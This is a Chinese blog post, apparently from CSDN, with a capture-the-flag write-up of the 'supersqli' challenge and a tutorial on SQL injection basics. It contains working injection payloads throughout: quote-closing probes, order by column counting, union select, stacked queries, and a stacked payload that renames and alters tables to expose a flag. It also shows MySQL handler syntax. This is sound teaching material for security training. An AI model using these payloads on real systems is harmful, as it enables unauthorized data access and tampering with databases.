攻防世界:supersqli

首先看这个题目supersqli超级数据库的意思,很明显涉及sql注入。

输入框里已经有一个数字1了,所以我们接着输入2,3,我们发现输入2出现不同内容,输入3不显示内容,输入框依旧返回1,但url出现不同

‘Inject=’后面出现不同的数值,则我们可以知道注入点是inject

那我们输入1’

报错,那我们加上注释符号#或者--+或者%23(注释掉后面语句,使1后面的单引号与前面的单引号成功匹配就不会报错)页面回显正常,那么闭合符号就是单引号。

我们再判断注入类型

查询1 and 1=1 和1 and 1=2,发现两次提交后页面一样,可以判断出为字符型注入漏洞;

再输入1' and '1'='1,1' and '1'='2两次都没有报错,且第二次返回结果为空,说明是字符型注入

查清楚漏洞,我们再来判断列数,这个我们就要用到order by

1' order by 2#// 回显正常,1' order by 3#     // 会报错

利用or 1=1暴露表中数据

1' or 1=1 order by 2 #
1' or 1=1 order by 3 #

3报错,2正常

尝试联合查询

1’ union select 1,2#

发现过滤了很多函数 ,select不能用

尝试堆叠注入,我们查看数据库1'; show databases;#查看表名1'; show tables;#有了表名,那我们接着查看表中的列-1'; show columns from `words`;#-1'; show columns from `1919810931114514`;#

我们可以看到flag已经出现了,但是select被过滤了,使用show命令不能直接查看,我们已经知道了words是用来回显内容,我们把1919810931114514这个表更改名字为words,并增加相应的字段,使之回显原1919810931114514这个表的内容。1';rename table `words` to `words1`;rename table `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100) ;show columns from words;#

用1'or '1'='1访问,即可得到flag

对于sql注入,我们要了解一些基础知识:

1、判断注入类型

数字型或者字符型,字符型的变量使用了引号,而数字型没有。

(1)数字型注入判断

常用语句:

1 and 1=1        

1 and 1=2     

假设注入类型为数字型,注入点为id,分别输入上面的语句,那么第一行测试语句会返回id为1的查询结果,而第二行语句由于条件and 1=2不成立,所以查询结果为空。如果注入类型为字符型,将上面语句拼接到sql中,由于id的值都不匹配,所以应该是都不返回任何结果,但是如果id本身是int类型,实际查询过程中是会返回结果的,这可能是因为对输入的字符进行了截断并转换了类型,造成1 and 1=2在字符类型中会返回id为1的查询结果。当然如果第二个语句返回了结果,我们也可以以此判断出该注入类型是字符型。

若两次返回结果一样,则为字符型注入。

(2)字符型注入判断

1' and '1'='1

1' and '1'='2

对于字符型注入判断,我们也可以这样进行操作,如上面的两条注入语句所示,如果是在数字型注入中,由于变量没有加引号,所以拼接后sql语法错误,直接报错,这和不回显信息是有区别。因此如果上面的语句注入后提示sql语法错误,那么我们可以直接判断测试对象为数字型注入。而对于字符型注入,第一行语句输入后和原本的引号前后完全闭合,且逻辑成立,所以回显出id为1的数据;第二行语句输入后,前后引号也完全闭合,但逻辑不成立,所以返回结果为空。

逻辑成立正常回显,逻辑不成立返回为空,类型错误直接报错。

2、猜解sql查询语句中的字段数(order by 的使用)

使用order by判断当前表的字段个数

例:?id=1 order by n --+

若n超过当前表的列数,就会报错,说明表中只有n-1列

假设为字符型注入,先利用1'实现引号闭环,再利用or 1=1这样可以暴露出表中所有的数据,最后利用order by num#去看是否报错来明确查询语句中的字段数,其中#号用于截断sql查询语句。

1' or 1=1 order by 1 #

1' or 1=1 order by 2 #

......

当然也可以采用1' or 1=1 union select 1, 2, 3 #的方式

3、判断显示位爆数据库的名字

判断显示位时,要使用 ?id=-1 或者改为0 让前面的select语句查询为空错误,然后采用后面的select语句去查询:

?id=-1' union select 1,2,3 --+

观察页面在哪里回显我们的输入,就可以用那个地方测试接下的语句

爆数据库的名字:

?id=1' union select 1,database(),3 --+

在之前回显2的地方会回显database数据库的名字

4、注释(--+的使用)

当输入参数为字符串时,称为字符型注入,它与数字型的区别:数字型不需要单引号来闭合,而字符串需要单引号来闭合。

例:https://blog.csdn.net/aboutus.php?id=1’

此时后台语句:$sql="SELECT 123 FROM abc WHERE id='1''"

此时多出了一个单引号,破坏了原本的SQL语句结构,数据库无法处理,于是会报错,证明这条语句成功被带进数据库查询,存在字符型注入。

此时通过 --+把后面的单引号注释掉,SQL语句也会形成闭合。

所以我们可以这样:

?id = 1' 攻击语句 --+

传入页面就变成了

select user from database where id = '1'攻击语句 – '

–+起注释作用,将后面的语句注释掉,在url中+相当于空格,–是注释符号,单行注释,之所以要加+号是因为–与单引号连在一起无法起注释作用因此必须把它们隔开。

5、堆叠注入

 在SQL中,分号(;)是用来表示一条sql语句的结束。我们在 ; 结束一个sql语句后继续构造下一条语句,就成了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间的区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制。

可注入条件:

目标存在sql注入漏洞;

目标未对";"号进行过滤;

目标中间层查询数据库信息时可同时执行多条sql语句。

6、handler语句及用法

handler是mysql的专用语句,没有包含到SQL标准中,但它每次只能查询1次记录,而select可以根据需要返回多条查询结果。

hander `表名` open;           // 打开一个表

handler`表名`read frist;      // 查询第一个数据

handler`表名`read next;     // 查询之后的数据直到最后一个数据返回空

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值